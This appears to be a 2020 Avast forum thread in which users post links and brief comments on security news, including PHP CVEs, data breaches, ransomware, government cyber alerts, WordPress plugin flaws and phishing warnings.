PHP headers vuln. - 5
CVE-2019-11048
In PHP versions 7.2.x below 7.2.31, 7.3.x below 7.3.18 and 7.4.x below 7.4.6, when HTTP file uploads are allowed, supplying overly long filenames or field names could lead PHP engine to try to allocate oversized memory storage, hit the memory limit and stop processing the request, without cleaning up temporary files created by upload request. This potentially could lead to accumulation of uncleaned temporary files exhausting the disk space on the target server.
5
CVE-2018-19935
ext/imap/php_imap.c in PHP 5.x and 7.x before 7.3.0 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an empty string in the message argument to the imap_mail function.
5
CVE-2020-7067
In PHP versions 7.2.x below 7.2.30, 7.3.x below 7.3.17 and 7.4.x below 7.4.5, if PHP is compiled with EBCDIC support (uncommon), urldecode() function can be made to access locations past the allocated memory, due to erroneously using signed numbers as array indexes.
5
One of such Mystery-groups involved from Perm: https://siterankdata.com/mystery-group.ru
One of the addresses - Network: https://www.shodan.io/host/31.131.251.113
see activities of May 31st last: https://www.abuseipdb.com/check/31.131.251.113
and from France IP-address involved: https://www.shodan.io/host/188.165.195.184
Address coming soon: - 188.165.195.184 - -otzyvysotrudnikov.xyz — Coming Soon
ending in xyz: https://www.abuseipdb.com/check/188.165.195.184
and https://www.projecthoneypot.org/ip_188.165.196.25 (malspider)
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
CPA Canada discloses data breach affecting 329,000 individuals
https://www.bleepingcomputer.com/news/security/cpa-canada-discloses-data-breach-affecting-329-000-individuals/
https://www.newswire.ca/news-releases/cpa-canada-provides-notice-of-data-security-incident-829517999.html
-
IPAS: Security Advisories for June 2020
https://blogs.intel.com/technology/2020/06/ipas-security-advisories-for-june-2020/
-
Increased Use of Mobile Banking Apps Could Lead to Exploitation
https://www.ic3.gov/media/2020/200610.aspx
-
FortiGuard Labs Discovers Privilege Escalation Vulnerability in Windows 10 Platform
https://www.fortinet.com/blog/threat-research/fortiguard-labs-security-researcher-discovers-privilege-escalation-vulnerability-in-windows-platform
-
6 New Vulnerabilities Found on D-Link Home Routers
https://unit42.paloaltonetworks.com/6-new-d-link-vulnerabilities-found-on-home-routers/
-
Weekly Security News Roundup w/e 6-12-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/06/15/17/34/cY1ob4Cx7p/preview.jpg) (https://youtu.be/XDaN6Ua45Dg)
https://youtu.be/XDaN6Ua45Dg (https://youtu.be/XDaN6Ua45Dg)
-
79 Netgear router models risk full takeover due to unpatched bug
https://www.bleepingcomputer.com/news/security/79-netgear-router-models-risk-full-takeover-due-to-unpatched-bug/
-
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/06/19/16/06/cY1qD1CHNV/preview.jpg)
-
Massive spying on users of Google's Chrome shows new security weakness
https://www.reuters.com/article/us-alphabet-google-chrome-exclusive/exclusive-massive-spying-on-users-of-googles-chrome-shows-new-security-weakness-idUSKBN23P0JO?utm_medium=Social&utm_source=twitter
https://awakesecurity.com/blog/the-internets-new-arms-dealers-malicious-domain-registrars/
-
Avast CEO, Ondrej Vlcek discusses the increase in cyber attacks
during the COVID-19 crisis and the rise in social engineering attacks.
https://ava.st/3epCDuR
-
Security Bulletin: NVIDIA GPU Display Driver - June 2020
https://nvidia.custhelp.com/app/answers/detail/a_id/5031/kw/Security%20Bulletin
-
Security Bulletin: NVIDIA GPU Display Driver - June 2020
https://nvidia.custhelp.com/app/answers/detail/a_id/5031/kw/Security%20Bulletin
A bit of a pain, I had just downloaded the latest NVIDIA GPU Display Driver a few days ago. Hoping to get past the win10 2004 update, device not yet ready comment.
I really don't like updating drivers (not a gamer) as they have this nasty habit of screwing up, just started downloading this one.
-
‘BlueLeaks’ Exposes Files from Hundreds of Police Departments
https://krebsonsecurity.com/2020/06/blueleaks-exposes-files-from-hundreds-of-police-departments/
-
Enormous increase in the number of PHISHING-sites.
Most damage is being dome in the initial hours when such sites have not yet been reported to be added to reputation lists.
Then it can also be days before they are been crossed out at registrars.
The security industry could play a more active role before abuse reports take effect to block them from the point go.
polonus
-
Hakbit Ransomware Campaign Against Germany, Austria, Switzerland
https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland
-
Weekly Security News Roundup w/e 6-26-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/06/29/12/12/cY1Ull52aJ/preview.jpg) (https://youtu.be/tTep3ALpVhY)
https://youtu.be/tTep3ALpVhY (https://youtu.be/tTep3ALpVhY)
-
Seller floods hacker forum with data stolen from 14 companies
https://www.bleepingcomputer.com/news/security/seller-floods-hacker-forum-with-data-stolen-from-14-companies/
-
Roblox accounts being hacked in support of Trump reelection
https://www.bleepingcomputer.com/news/security/roblox-accounts-being-hacked-in-support-of-trump-reelection/
-
‘BlueLeaks’ Exposes Files from Hundreds of Police Departments
https://krebsonsecurity.com/2020/06/blueleaks-exposes-files-from-hundreds-of-police-departments/
How the BlueLeaks data breach happened
https://blog.avast.com/understanding-blueleaks-avast
-
Dismantling of an encrypted network sends shockwaves through organised crime groups across Europe
https://www.europol.europa.eu/newsroom/news/dismantling-of-encrypted-network-sends-shockwaves-through-organised-crime-groups-across-europe
-
Weekly Security News Roundup w/e 7-3-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/07/06/14/26/cYi12O5an0/preview.jpg) (https://youtu.be/eB5-XUhkmew)
https://youtu.be/eB5-XUhkmew (https://youtu.be/eB5-XUhkmew)
-
Beware “secure DNS” scam targeting website owners and bloggers
https://nakedsecurity.sophos.com/2020/06/29/beware-secure-dns-scam-targeting-website-owners-and-bloggers/
-
Keeper's card-skimming Magecart:
https://geminiadvisory.io/wp-content/uploads/2020/07/Appendix-C-1.pdf
Read: https://www.theregister.com/2020/07/07/keeper_crew_magecart/
Right now, the injection-and-collection server remains active,
though a Gemini Advisory spokesperson told The Register it has alerted law enforcement.
polonus
-
Mozilla suspends Firefox Send service while it addresses malware abuse
https://www.zdnet.com/article/mozilla-suspends-firefox-send-service-while-it-addresses-malware-abuse/
-
Mozilla suspends Firefox Send service while it addresses malware abuse
https://www.zdnet.com/article/mozilla-suspends-firefox-send-service-while-it-addresses-malware-abuse/
Interesting, I use Firefox and I had never heard of this Firefox Send tool :)
-
L.S.
Open-source package vulnerabilities: https://www.theregister.com/2020/06/26/open_source_security_snyk_survey/
report: https://snyk.io/open-source-security-report/
Re: https://snyk.io/vuln
polonus
-
3.4M LiveAuctioneers users’ PII and cracked passwords for sale on data sharing forum
https://cloudsek.com/threatintelligence/3-4-m-liveauctioneers-users-pii-and-cracked-passwords-for-sale-on-data-sharing-forum/
https://help.liveauctioneers.com/article/496-july-11-2020-liveauctioneers-account-security
-
Records of 45 Million+ travelers to Thailand and Malaysia Leaked on Darkweb!!
https://cybleinc.com/2020/07/12/records-of-45-million-travelers-to-thailand-and-malaysia-leaked-on-darkweb/
-
Weekly Security News Roundup w/e 7-10-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/07/15/17/54/cYiobLEn1c/preview.jpg) (https://youtu.be/lDtHvpDAcFs)
https://youtu.be/lDtHvpDAcFs (https://youtu.be/lDtHvpDAcFs)
-
Apple, Kanye, Gates, Bezos, more hacked in Twitter account crypto scam
https://www.bleepingcomputer.com/news/security/apple-kanye-gates-bezos-more-hacked-in-twitter-account-crypto-scam/
-
Apple, Kanye, Gates, Bezos, more hacked in Twitter account crypto scam
https://www.bleepingcomputer.com/news/security/apple-kanye-gates-bezos-more-hacked-in-twitter-account-crypto-scam/
Scammers hacked Twitter and hijacked accounts using admin tool
https://www.bleepingcomputer.com/news/security/scammers-hacked-twitter-and-hijacked-accounts-using-admin-tool/
-
Emotet botnet returns after a five-month absence
https://www.zdnet.com/article/emotet-botnet-returns-after-a-five-month-absence/
-
“Zero logs” VPN exposes millions of logs including user passwords, claims data is anonymous
https://www.comparitech.com/blog/vpn-privacy/ufo-vpn-data-exposure/
Report: No-Log VPNs Exposed Users’ Logs and Personal Details for All to See
https://www.vpnmentor.com/blog/report-free-vpns-leak/
-
Garmin services and production go down after ransomware attack.
Details here (https://www.zdnet.com/article/garmin-services-and-production-go-down-after-ransomware-attack/?ftag=TRE-03-10aaa6b&bhid=20703016557828276829617940745163&mid=12944999&cid=717091465&fbclid=IwAR0KjA5gSu7U2WpipstUmTgUNDMS_u0wsUp5uMpxWyHV0XAGTUTbOoyYf4o)
-
FBI warns US companies about backdoors in Chinese tax software
https://www.zdnet.com/article/fbi-warns-us-companies-about-backdoors-in-chinese-tax-software/
-
Source code from dozens of companies leaked online
https://www.bleepingcomputer.com/news/security/source-code-from-dozens-of-companies-leaked-online/
-
Additionally to what bob3160 wrote on Garmin's interruptions:
Update: https://status.inreach.garmin.com/
Garmin leaked internal memo on iThome.com [article in Taiwanese --> Google Translate]
-> https://archive.is/https://www.ithome.com.tw/news/139004
Alternative product to use: https://www.vernier.com/product/labquest-2/
polonus
-
Weekly Security News Roundup w/e 7/24/2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/07/27/13/56/cYitI8EAi9/preview.jpg) (https://youtu.be/9SQ9Zdv0hgU)
https://youtu.be/9SQ9Zdv0hgU (https://youtu.be/9SQ9Zdv0hgU)
-
Potential Legacy Risk from Malware Targeting QNAP NAS Devices
https://us-cert.cisa.gov/ncas/alerts/aa20-209a
-
Mobile banking-app Dave leaks data of 2.9 million users.
Here we can see who's "really lost" in this case: https://dave.com/.well-known/security.txt ;)
Read on this security.txt initiative for security policy standard researchers: https://securitytxt.org/
and spread the word.
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
Hacker leaks 386 million user records from 18 companies for free
https://www.bleepingcomputer.com/news/security/hacker-leaks-386-million-user-records-from-18-companies-for-free/
-
Hacker leaks 386 million user records from 18 companies for free
https://www.bleepingcomputer.com/news/security/hacker-leaks-386-million-user-records-from-18-companies-for-free/ (https://www.bleepingcomputer.com/news/security/hacker-leaks-386-million-user-records-from-18-companies-for-free/)
If leaking this information is illegal, and apparently BleepingComputer is able to 'talk' to this hacker, I wonder if
BleepingComputer has an obligation to report this to the authorities? I wonder if they've done that?
-
Hacker leaks 386 million user records from 18 companies for free
https://www.bleepingcomputer.com/news/security/hacker-leaks-386-million-user-records-from-18-companies-for-free/ (https://www.bleepingcomputer.com/news/security/hacker-leaks-386-million-user-records-from-18-companies-for-free/)
If leaking this information is illegal, and apparently BleepingComputer is able to 'talk' to this hacker, I wonder if
BleepingComputer has an obligation to report this to the authorities? I wonder if they've done that?
Or be complicit ?
-
Apple, Kanye, Gates, Bezos, more hacked in Twitter account crypto scam
https://www.bleepingcomputer.com/news/security/apple-kanye-gates-bezos-more-hacked-in-twitter-account-crypto-scam/
Scammers hacked Twitter and hijacked accounts using admin tool
https://www.bleepingcomputer.com/news/security/scammers-hacked-twitter-and-hijacked-accounts-using-admin-tool/
Florida Teenager Is Charged as ‘Mastermind’ of Twitter Hack
https://www.nytimes.com/2020/07/31/technology/twitter-hack-arrest.html
-
Newsletter Plugin Vulnerabilities Affect Over 300,000 Sites
https://www.wordfence.com/blog/2020/08/newsletter-plugin-vulnerabilities-affect-over-300000-sites/
-
Hacker leaks passwords for 900+ enterprise VPN servers
https://www.zdnet.com/article/hacker-leaks-passwords-for-900-enterprise-vpn-servers/
-
How to detect malcious webshop websites?
Read: https://www.ic3.gov/media/2020/200803.aspx
There are plenty of ways to check online whether a webshop is to be trusted, like scamadviser, UrlVoid, Trustpilot, etc.
Mozilla observatory. HTTP downgraded websites are suspicious. Also contructions like WW2 etc.
Brand new registrations , whois data through 3rd parties.
Misspellings and grammatical errors.
Often cybercrinimals give themselves away in such ways.
When something seems too good to be true, then that might really be the case.
Always use your common sense under all circumstances.
polonus
-
Critical Vulnerability Exposes over 700,000 Sites Using Divi, Extra, and Divi Builder
https://www.wordfence.com/blog/2020/08/critical-vulnerability-exposes-over-700000-sites-using-divi-extra-and-divi-builder/
-
Intel investigating breach after 20GB of internal documents leak online
https://www.zdnet.com/article/intel-investigating-breach-after-20gb-of-internal-documents-leak-online/
-
US shares info on election interference tied to Russia, China, Iran
https://www.bleepingcomputer.com/news/security/us-shares-info-on-election-interference-tied-to-russia-china-iran/
-
Weekly Security News Roundup w/e 8-7-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/08/11/12/00/cYjXlcGTb7/preview.jpg) (https://youtu.be/uriyhbdMkbY)
https://youtu.be/uriyhbdMkbY (https://youtu.be/uriyhbdMkbY)
-
Canon USA's stolen files leaked by Maze ransomware gang
https://www.bleepingcomputer.com/news/security/canon-usas-stolen-files-leaked-by-maze-ransomware-gang/
-
Has Google the intention of phasing out URLs completely in the beowser?
See: https://blog.chromium.org/2020/08/helping-people-spot-spoofs-url.html
Research: https://research.google/pubs/pub49166/
Who are the real authorities to decide this. Protocol Authorities or Big Tech from Silicon Valley or Sillicon Forest?
End users may never learn not to click a ww2.somecybercriminaldomain dot com or ending in su (soviet union often used by malcreants).
polonus
-
Has Google the intention of phasing out URLs completely in the beowser?
See: https://blog.chromium.org/2020/08/helping-people-spot-spoofs-url.html
Research: https://research.google/pubs/pub49166/
Who are the real authorities to decide this. Protocol Authorities or Big Tech from Silicon Valley or Sillicon Forest?
End users may never learn not to click a ww2.somecybercriminaldomain dot com or ending in su (soviet union often used by malcreants).
polonus
I'm not sure which I like least Googles involvement in so called solution this or the domain name spoofing problem.
If you arrive at a spoofed address in the first place it really is too late. Always check links before you click, especially in emails or other websites, I always hover over links in emails or browser to display the underlying URL.
The first solution to this issue is sat in the chair in front of the screen (or PEBCAK) :D
-
Drovorub malware attacking linux systems: See: https://www.theregister.com/2020/08/13/drovorub_nsa_fbi/
Read:
https://www.nsa.gov/news-features/press-room/Article/2311407/nsa-and-fbi-expose-russian-previously-undisclosed-malware-drovorub-in-cybersecu/
Also: https://blog.cygenta.co.uk/drovorub-apt/
Such malware has been with us since 2015. It is all feasable because of the monolithic character of the linux kernel,
that manages all resources like processes and access to devices.
Compare it with loadable device malcode from the Microsoft Dos period via "string" command.
It works through modification and manipulation of a dynamical LKM (loadable kernel module).
From user mode one can get access to call table via sys call and get sys open.
Auditing and kernel file signing protects against such malware modules and toolkits worked by stately agents,
read: https://www.oracle.com/technical-resources/articles/linux/signed-kernel-modules.html
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
Spam filter in G-mail is slipping
I received the following email today,
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/08/16/16/45/cYjDDGGHna/preview.jpg)
This is an obvious Phishing attempt. It was sent from
a no-reply <ravagepuff(at)ravagepuff.com> e-mail address
and obviously has nothing to do with UPS.
The OK and other links lead you to the following web address,
hxxps://silvadi-5488.s3.us-east-2.amazonaws.com/11.html#qs=r-acacaeffekjgadggkibhfaefgfiabaefgfiabaefacbhaccajdfacfjjahhidcacb.
(I've broken the actual link on purpose)
The only reward you'll get by following any of these links is an empty bank account and Identity theft.
Always treat any email you receive with suspicion and prevent getting hacked or having your identity stolen.
-
Weekly Security News Roundup w/e 8-14-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/08/17/18/29/cYjbFUGs0Y/preview.jpg) (https://youtu.be/j_zqzO7tCGc)
https://youtu.be/j_zqzO7tCGc (https://youtu.be/j_zqzO7tCGc)
-
Thousands and thousands of Word Press sites vulnerable.
Re: https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/
Vulnerable plug-ins should now have been patched.
An ongoing drama this PHP based Word Press Content Management Software in the hands of those
that do not know how to configure it properly or maintain it, keep it updated and fully patched (plug-ins).
Know about the many websites that now launch malcode like emotet malware and heodo malcode:
See: https://urlhaus.abuse.ch/browse/
Lot of times we see WP sites with outdated kernel versions, outdated or even left plug-in code,
user enumeration not later set to "disabled"not directory listing. Look here for reported websites:
Check your Word Press website against this scanner: https://hackertarget.com/wordpress-security-scan/
Important: https://www.wordfence.com/blog/2020/08/wordpress-auto-updates-what-do-you-have-to-lose/
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
Microsoft issues out of band KB4578013 Windows security update
https://www.bleepingcomputer.com/news/security/microsoft-issues-out-of-band-kb4578013-windows-security-update/
-
Microsoft issues out of band KB4578013 Windows security update
https://www.bleepingcomputer.com/news/security/microsoft-issues-out-of-band-kb4578013-windows-security-update/
Given this is about the Remote Access Service, something which isn't available to windows 10 home users. I wonder if it would even be offered to win10 home users ?
That said, this is for Windows 8.1 versions, which I don't know if the same would apply for Windows 8.1 home users not having the remote access function.
-
Microsoft issues out of band KB4578013 Windows security update
https://www.bleepingcomputer.com/news/security/microsoft-issues-out-of-band-kb4578013-windows-security-update/ (https://www.bleepingcomputer.com/news/security/microsoft-issues-out-of-band-kb4578013-windows-security-update/)
The KB4578013 security update fixes two Windows Remote Access elevation of privilege vulnerabilities affecting
all supported versions of Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2.
-
Weekly Security News Roundup w/e 8-21-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/08/22/12/48/cYj3lJmDoj/preview.jpg) (https://youtu.be/WaNdJ50bP7c)
https://youtu.be/WaNdJ50bP7c
-
25 Top Most Dangerous Weaknesses: : https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html
See image attached.
polonus
-
Fake Malwarebytes installation files distributing coinminer
https://blog.avast.com/fake-malwarebytes-installation-files-distributing-coinminer
-
Still some 20.000 Word Press WooCommerce websites at risk through vulnerable outdated plug-in by the name of "Discount Rules":
https://wordpress.org/plugins/woo-discount-rules/
Detected by security firm webarxsecurity, read: https://www.webarxsecurity.com/multiple-vulnerabilities-in-discount-rules-for-woocommerce-plugin/
The Discount Rules for WooCommerce plugin (versions 2.0.2 and below) suffers from multiple vulnerabilities such as SQL injection, authorization issues and unauthenticated stored cross-site scripting.
In this scenario, the unauthenticated stored cross-site scripting issue could potentially lead to remote code execution.
Check at https://hackertarget.com/wordpress-security-scan/
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
Alert (AA20-239A) - FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks
https://us-cert.cisa.gov/ncas/alerts/aa20-239a
-
Slack fixes 'critical' vulnerability that left desktop app users open to attack
https://mashable.com/article/slack-fixes-critical-remote-code-execution-vulnerabilitybug-bounty/
-
Apple mistakenly approved a widely used malware to run on Macs
https://techcrunch.com/2020/08/31/apple-notarized-mac-malware/
-
Over 400 GOV.UK domains found on spam blacklists
https://www.bleepingcomputer.com/news/security/over-400-govuk-domains-found-on-spam-blacklists/
-
Cybercriminal greeners from Iran attack companies worldwide for financial gain
https://www.group-ib.com/media/iran-cybercriminals
-
Microsoft Defender can ironically be used to download malware
https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/
-
Weekly Security News Roundup W/E 9.4.2020
https://podcasts.apple.com/us/podcast/weekly-security-news-roundup-w-e-9-4-2020/id1511579697?i=1000490094741 (https://podcasts.apple.com/us/podcast/weekly-security-news-roundup-w-e-9-4-2020/id1511579697?i=1000490094741)
-
Windows 10 Sandbox activation enables zero-day vulnerability
https://www.bleepingcomputer.com/news/security/windows-10-sandbox-activation-enables-zero-day-vulnerability/
-
Windows 10 Sandbox activation enables zero-day vulnerability
https://www.bleepingcomputer.com/news/security/windows-10-sandbox-activation-enables-zero-day-vulnerability/ (https://www.bleepingcomputer.com/news/security/windows-10-sandbox-activation-enables-zero-day-vulnerability/)
If this is activated you could be vulnerable.
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/09/08/14/26/cYQj2OHEmZ/preview.jpg)
-
Three governmental warnings against emotet malware attacks (France, Japan and New-Zealand):
Read: https://www.cert.ssi.gouv.fr/alerte/CERTFR-2020-ALE-019/
and https://twitter.com/CERT_FR/status/1303011855187742722
and https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/
Advice is to disable macro's in Windows Office completely, and/or only allow digitally signed macro's.
Also Power Shell should be so configured that it is only allowed to run signed scripts.
A good resource for reported emotet malcode online can be found at URLHaus.
Visit: https://urlhaus.abuse.ch/browse/ and scan with emotet as query.
Indeed Windows Office MS macro is the bitch.
That is why I run Voodoo Shield and use open source LibreOffice.
And I do not run my OS as admin, but as normal user.
Yep, linux OS is more secure, when rightly configured by a user, that knows what she or he is doing.
It has never come under so much attack as Microsoft Windows has.
But that again is quite another topic.
Again forewarned means forearmed.
polonus
-
Security News Roundup for the Week Ending 9-11-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/09/11/14/10/cYQX26JfKk/preview.jpg) (https://youtu.be/QdlpvMYm3SI)
https://youtu.be/QdlpvMYm3SI
-
Some 140.000 and even more Word Press CMS websites with vulnerable File Manager plug-in
open to log-in password stealing malware.
Read: https://www.wordfence.com/blog/2020/09/attackers-fight-for-control-of-sites-targeted-in-file-manager-vulnerability/
Info source: Defiant's Ram Gall,
polonus
-
Some 140.000 and even more Word Press CMS websites with vulnerable File Manager plug-in
open to log-in password stealing malware.
Read: https://www.wordfence.com/blog/2020/09/attackers-fight-for-control-of-sites-targeted-in-file-manager-vulnerability/ (https://www.wordfence.com/blog/2020/09/attackers-fight-for-control-of-sites-targeted-in-file-manager-vulnerability/)
Info source: Defiant's Ram Gall,
polonus
I guess tou didn't look at my post. It was covered. :)
https://youtu.be/QdlpvMYm3SI
-
Windows 10 ‘Finger’ command can be abused to download or steal files
https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/
http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt
-
Windows 10 ‘Finger’ command can be abused to download or steal files
https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/ (https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/)
http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt (http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt)
So how did they get into your computer to start executing these commands?
-
Alert (AA20-258A) - Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity
https://us-cert.cisa.gov/ncas/alerts/aa20-258a
-
Weekly Security News Roundup w/e 9/18/2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/09/18/16/21/cYQFDrJKTO/preview.jpg) (https://youtu.be/UKHIqmZLOI4)
https://youtu.be/UKHIqmZLOI4 (https://youtu.be/UKHIqmZLOI4)
-
The Windows XP source code was allegedly leaked online
https://www.bleepingcomputer.com/news/microsoft/the-windows-xp-source-code-was-allegedly-leaked-online/
-
Weekly Security News Roundup w/e 9-25-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/09/25/14/48/cYQT2JdvSw/preview.jpg) (https://youtu.be/SWe7cuhRzN8)
https://youtu.be/SWe7cuhRzN8 (https://youtu.be/SWe7cuhRzN8)
-
Linux under WSL2 can be leaking
https://mullvad.net/en/blog/2020/9/30/linux-under-wsl2-can-be-leaking/
-
NVIDIA fixes high severity flaws in Windows display driver
https://www.bleepingcomputer.com/news/security/nvidia-fixes-high-severity-flaws-in-windows-display-driver/
-
Weekly Security News Roundup w/e 10-2-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/10/02/14/45/cY6n2GK6y1/preview.jpg) (https://youtu.be/RAYDrEpF4UA)
https://youtu.be/RAYDrEpF4UA (https://youtu.be/RAYDrEpF4UA)
-
Online avatar service Gravatar allows mass collection of user info
https://www.bleepingcomputer.com/news/security/online-avatar-service-gravatar-allows-mass-collection-of-user-info/
-
New Flaws in Top Antivirus Software Could Make Computers More Vulnerable
https://thehackernews.com/2020/10/antivirus-software-vulnerabilities.html
-
New Flaws in Top Antivirus Software Could Make Computers More Vulnerable
https://thehackernews.com/2020/10/antivirus-software-vulnerabilities.html (https://thehackernews.com/2020/10/antivirus-software-vulnerabilities.html)
It's nice to see that Avast isn't on the list. :)
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/10/06/14/52/cY612sKvmB/preview.jpg)
-
Alert (AA20-280A) - Emotet Malware
https://us-cert.cisa.gov/ncas/alerts/aa20-280a
-
Why browser-developer Brave launches a version 2 (less secure) own website on the Tor-network?
The address Brave choose = -http://brave5t5rjjg3s6k.onion/
The outdated Tor v2 .onion services protocol (with the short .onion address consisting of a string of 16 characters) will be phased out in the year 2021. Therefore you'd better register the longer v3 .onion addresses ( 56 characters long), when available. Existing v2 onion addresses will function as long as the Tor network support for them will last (ending July 15th of 2021), and then will become obsolete. The newer v3 protocol is much more secure as the previous one was.
(info source: credits for this indo goes to anonymous on Security dot nl)
As humankind's understanding of math and cryptography evolved, the foundation of version 2 became fragile and at this point in time, unsafe. If you want to read more about the technical problems that version 2 faces, please read this post and don't hesitate to ask questions if any.
Read: https://blog.torproject.org/v2-deprecation-timeline
polonus
-
Weekly Security News Roundup w/e 10/9/2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/10/10/20/29/cY66YUKNmI/preview.jpg) (https://youtu.be/LMYMmjIa07k)
https://youtu.be/LMYMmjIa07k (https://youtu.be/LMYMmjIa07k)
-
US Cyber Command: Patch Windows 'Bad Neighbor' TCP/IP bug now
https://www.bleepingcomputer.com/news/security/us-cyber-command-patch-windows-bad-neighbor-tcp-ip-bug-now/
-
What is your password ;D
https://www.youtube.com/watch?v=RfAdux3XidM&feature=youtu.be
-
What is your password ;D
https://www.youtube.com/watch?v=RfAdux3XidM&feature=youtu.be (https://www.youtube.com/watch?v=RfAdux3XidM&feature=youtu.be)
I liked the ZOOM commercial that preceded the video. :)
-
Barnes & Noble hit by cyberattack that exposed customer data
https://www.bleepingcomputer.com/news/security/barnes-and-noble-hit-by-cyberattack-that-exposed-customer-data/
-
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/10/16/14/02/cY6D2n7T8x/preview.jpg) (https://youtu.be/RWLDG0qNJiM)
https://youtu.be/RWLDG0qNJiM (https://youtu.be/RWLDG0qNJiM)
-
FBI warns of newly registered domains spoofing US Census Bureau
https://www.bleepingcomputer.com/news/security/fbi-warns-of-newly-registered-domains-spoofing-us-census-bureau/
-
NSA Warns Chinese State-Sponsored Malicious Cyber Actors Exploiting 25 CVEs
https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/
https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF
-
Security Bulletin: NVIDIA GeForce Experience - October 2020
https://nvidia.custhelp.com/app/answers/detail/a_id/5076
-
Weekly Security News Roundup w/e 10-23-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/10/23/18/37/cY60FAsf0W/preview.jpg) (https://youtu.be/f6rXDmnXIFs)
https://youtu.be/f6rXDmnXIFs
-
On computer startup, the common Adobe Flash player update box opened. It mentioned the end of Flash player at year's end, and gave the option to update or uninstall if not using flash based content on my computer.
I chose to uninstall, as I could always reinstall later if need be. AVAST came up with a warning, "Threat Blocked - We've blocked INSTALLFLASHPLAYER.EXE because it was infected with IDP.Generic - what would you like to do, 'move to virus chest' (which I did) or 'more options - create an exception'.
Is this happening to everyone, ie; is it an AVAST false positive?
-
@dougjp,
No I did not get any Avast warning when I uninstalled Flash Player when prompted.
If you have the offending .exe in your virus chest, then you should be able to submit it for analysis from there.
See:
https://support.avast.com/en-ww/article/Use-Antivirus-Virus-Chest#idt_40
PS: The best place to ask questions like yours is in the "Virus and Worms" section of the forum.
https://forum.avast.com/index.php?board=4.0
-
Massive Nitro data breach impacts Microsoft, Google, Apple, more
https://www.bleepingcomputer.com/news/security/massive-nitro-data-breach-impacts-microsoft-google-apple-more/
-
Amazon Fired Employee for Leaking Customer Emails
https://www.vice.com/en/article/dy8zwz/amazon-fired-employee-leaking-customer-emails
-
Weekly Security News Roundup w/e 10-30-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/10/31/17/03/cY6wbesE8Y/preview.jpg) (https://youtu.be/8NxcHESYsjA)
https://youtu.be/8NxcHESYsjA (https://youtu.be/8NxcHESYsjA)
-
Windows kernel zero-day vulnerability used in targeted attacks
https://www.bleepingcomputer.com/news/security/windows-kernel-zero-day-vulnerability-used-in-targeted-attacks/
-
Hacker is selling 34 million user records stolen from 17 companies
https://www.bleepingcomputer.com/news/security/hacker-is-selling-34-million-user-records-stolen-from-17-companies/
-
Windows kernel zero-day vulnerability used in targeted attacks
https://www.bleepingcomputer.com/news/security/windows-kernel-zero-day-vulnerability-used-in-targeted-attacks/ (https://www.bleepingcomputer.com/news/security/windows-kernel-zero-day-vulnerability-used-in-targeted-attacks/)
While Microsoft has confirmed that the reported attack is real, it also suggests that it is limited in scope being targeted in nature. This is not, at least as of yet, a widespread broad-sweep exploit. Microsoft says that it has no evidence of any indication of widespread exploits.
The attack requires two vulnerabilities to be chained together for a successful exploit to happen. One of them has already been patched. That was a browser-based vulnerability, CVE-2020-15999, in Chrome browsers, including Microsoft Edge. As long as your browser is up to date, you are protected. Microsoft Edge was updated on October 22 (https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200002) while Google Chrome was updated on October 20 (https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html).
(It's easy to spread doom and gloom. It takes a bit more effort to tell the whole story.)
-
Weekly Security News Roundup w/e 11-6-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/11/07/16/25/cYXiDTMFGV/preview.jpg) (https://youtu.be/OoIVf1Ue1cU)
https://youtu.be/OoIVf1Ue1cU (https://youtu.be/OoIVf1Ue1cU)
-
HMRC smishing tax scam targets UK banking customers
